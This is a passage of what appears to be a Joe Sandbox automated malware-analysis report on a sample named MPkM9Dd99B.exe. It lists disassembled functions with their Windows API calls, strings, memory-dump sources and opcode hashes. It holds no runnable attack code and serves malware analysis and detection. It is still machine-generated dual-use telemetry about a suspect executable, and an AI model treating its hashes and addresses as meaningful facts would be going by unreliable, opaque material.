                                • CharPrevA.USER32(0000000C,0000000C,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406588
                                • "C:\Users\user\Desktop\MPkM9Dd99B.exe", xrefs: 00406587
                                • *?|<>/":, xrefs: 004065CF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Char$Next$Prev
                                • String ID: "C:\Users\user\Desktop\MPkM9Dd99B.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                • API String ID: 589700163-954109453
                                • Opcode ID: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                • Instruction ID: 9f335943bb0e62a209881404c60ffb6aa99012b8199ff17f999404b9432e9d26
                                • Opcode Fuzzy Hash: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                • Instruction Fuzzy Hash: 871104618053923DFB3216282C44B777F894F97760F1A007FE5C2722C6CA7C5C62966D
                                APIs
                                • GetWindowLongA.USER32(?,000000EB), ref: 004043B1
                                • GetSysColor.USER32(00000000), ref: 004043EF
                                • SetTextColor.GDI32(?,00000000), ref: 004043FB
                                • SetBkMode.GDI32(?,?), ref: 00404407
                                • GetSysColor.USER32(?), ref: 0040441A
                                • SetBkColor.GDI32(?,?), ref: 0040442A
                                • DeleteObject.GDI32(?), ref: 00404444
                                • CreateBrushIndirect.GDI32(?), ref: 0040444E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                • String ID:
                                • API String ID: 2320649405-0
                                • Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                • Instruction ID: 0cb6da092899fbd89936ee00678fc1211e2f1892718b1dfe439ae8b372ce6297
                                • Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                • Instruction Fuzzy Hash: E32177715007049BCF309F78D948B577BF8AF81714B04893DEAA6B26E1C734E948CB58
                                APIs
                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C9B
                                • GetMessagePos.USER32 ref: 00404CA3
                                • ScreenToClient.USER32(?,?), ref: 00404CBD
                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404CCF
                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404CF5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Message$Send$ClientScreen
                                • String ID: f
                                • API String ID: 41195575-1993550816
                                • Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                • Instruction ID: 8ac1eb656b69e247d5f05692bef4687e0c0d70a1275d834663b2b8f38aac2a1a
                                • Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                • Instruction Fuzzy Hash: B6019E71900218BAEB00DB94DD81FFFBBBCAF44711F10012BBA01B61C0C7B899418BA4
                                APIs
                                • GetDC.USER32(?), ref: 00401E5D
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
                                • ReleaseDC.USER32(?,00000000), ref: 00401E90
                                • CreateFontIndirectA.GDI32(0040B830), ref: 00401EDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CapsCreateDeviceFontIndirectRelease
                                • String ID: Times New Roman
                                • API String ID: 3808545654-927190056
                                • Opcode ID: 3ab25366fc8e8bfe16e2d28a3ebe65f723501a18dd55c5dc8e8496ebd1575ba0
                                • Instruction ID: 3235dfa2473664f3223cdf9cba53c0ab50ba273bd9661b34cbd5463b8b999ac8
                                • Opcode Fuzzy Hash: 3ab25366fc8e8bfe16e2d28a3ebe65f723501a18dd55c5dc8e8496ebd1575ba0
                                • Instruction Fuzzy Hash: FE017572504344AFE7107B60AE49B9E3FF8E715701F10897AF181B62F2CB7800058B6D
                                APIs
                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E65
                                • MulDiv.KERNEL32(001499AA,00000064,0014A4B8), ref: 00402E90
                                • wsprintfA.USER32 ref: 00402EA0
                                • SetWindowTextA.USER32(?,?), ref: 00402EB0
                                • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EC2
                                Strings
                                • verifying installer: %d%%, xrefs: 00402E9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Text$ItemTimerWindowwsprintf
                                • String ID: verifying installer: %d%%
                                • API String ID: 1451636040-82062127
                                • Opcode ID: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                • Instruction ID: 08bf30aeaad7c3c0f985f8b81484beb4ade113f1463dbf8d033ac048ea6a4a00
                                • Opcode Fuzzy Hash: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                • Instruction Fuzzy Hash: EF016270640208FBEF209F60DE09EEE3769AB10304F008039FA06B51E1DBB89D56CF99
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040286E
                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040288A
                                • GlobalFree.KERNEL32(?), ref: 004028C9
                                • GlobalFree.KERNEL32(00000000), ref: 004028DC
                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028F8
                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040290B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                • String ID:
                                • API String ID: 2667972263-0
                                • Opcode ID: f2f5004db618060fe317ee0d1003544e1a2fa323f5e59acd3a511c365c814511
                                • Instruction ID: f5f6ffd272893f167dd8362f30c9a288e23aa0477cfe19fc00766ec7197ba147
                                • Opcode Fuzzy Hash: f2f5004db618060fe317ee0d1003544e1a2fa323f5e59acd3a511c365c814511
                                • Instruction Fuzzy Hash: EA319E32C00124BBEF216FA5CE48D9E7A79EF04364F10823AF554B72E1CB7949419FA8
                                APIs
                                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: CloseEnum$DeleteValue
                                • String ID:
                                • API String ID: 1354259210-0
                                APIs
                                • GetDlgItem.USER32(?,?), ref: 00401DA3
                                • GetClientRect.USER32(?,?), ref: 00401DF1
                                • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
                                • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
                                • DeleteObject.GDI32(00000000), ref: 00401E45
                                Similarity
                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                • String ID:
                                • API String ID: 1849352358-0
                                APIs
                                • lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                • wsprintfA.USER32 ref: 00404C1C
                                • SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                Similarity
                                • API ID: ItemTextlstrlenwsprintf
                                • String ID: %u.%u%s%s
                                • API String ID: 3540041739-3551169577
                                APIs
                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C25
                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00405C2E
                                • lstrcatA.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405C3F
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C1F
                                Similarity
                                • API ID: CharPrevlstrcatlstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 2659869361-4083868402
                                APIs
                                • CharNextA.USER32(?,?,C:\,0000000C,00405D24,C:\,C:\,75573410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe"), ref: 00405CC6
                                • CharNextA.USER32(00000000), ref: 00405CCB
                                • CharNextA.USER32(00000000), ref: 00405CDF
                                Similarity
                                • API ID: CharNext
                                • String ID: C:\
                                • API String ID: 3213498283-3404278061
                                APIs
                                • DestroyWindow.USER32(00000000,00000000,004030AB,00000001,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402EE0
                                • GetTickCount.KERNEL32 ref: 00402EFE
                                • CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F1B
                                • ShowWindow.USER32(00000000,00000005,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F29
                                Similarity
                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                • String ID:
                                • API String ID: 2102729457-0
                                APIs
                                • IsWindowVisible.USER32(?), ref: 00405374
                                • CallWindowProcA.USER32(?,?,?,?), ref: 004053C5
                                  • Part of subcall function 00404379: SendMessageA.USER32(0001043C,00000000,00000000,00000000), ref: 0040438B
                                Similarity
                                • API ID: Window$CallMessageProcSendVisible
                                • String ID:
                                • API String ID: 3748168415-3916222277
                                APIs
                                • FreeLibrary.KERNEL32(?,75573410,00000000,C:\Users\user\AppData\Local\Temp\,004039D9,004037BF,?,?,00000008,0000000A,0000000C), ref: 00403A1B
                                • GlobalFree.KERNEL32(00000000), ref: 00403A22
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A01
                                Similarity
                                • API ID: Free$GlobalLibrary
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 1100898210-4083868402
                                APIs
                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MPkM9Dd99B.exe,C:\Users\user\Desktop\MPkM9Dd99B.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A), ref: 00405C6C
                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MPkM9Dd99B.exe,C:\Users\user\Desktop\MPkM9Dd99B.exe,80000000,00000003,?,?,00403722,?), ref: 00405C7A
                                Similarity
                                • API ID: CharPrevlstrlen
                                • String ID: C:\Users\user\Desktop
                                • API String ID: 2709904686-1876063424
                                APIs
                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405DAD
                                • CharNextA.USER32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DBE
                                • lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                Similarity
                                • API ID: lstrlen$CharNextlstrcmpi
                                • String ID:
                                • API String ID: 190613189-0